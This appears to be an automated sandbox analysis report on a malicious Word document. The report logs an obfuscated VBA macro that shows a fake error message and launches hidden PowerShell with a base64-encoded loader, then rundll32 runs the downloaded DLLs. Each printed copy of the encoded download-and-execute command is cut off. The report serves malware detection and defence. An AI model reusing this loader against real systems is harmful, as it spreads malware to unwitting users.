Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094179270.0000000002AE0000.00000002.00000001.sdmp

Source: Doc.doc

Initial sample: OLE summary subject = fuchsia Health & Industrial copying PNG National Handcrafted Plastic Towels utilize Baby & Grocery interface array

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: Doc.doc	Stream path 'Macros/VBA/Qfepbztq9r8o1l76' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Qfepbztq9r8o1l76			Name: Qfepbztq9r8o1l76

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZg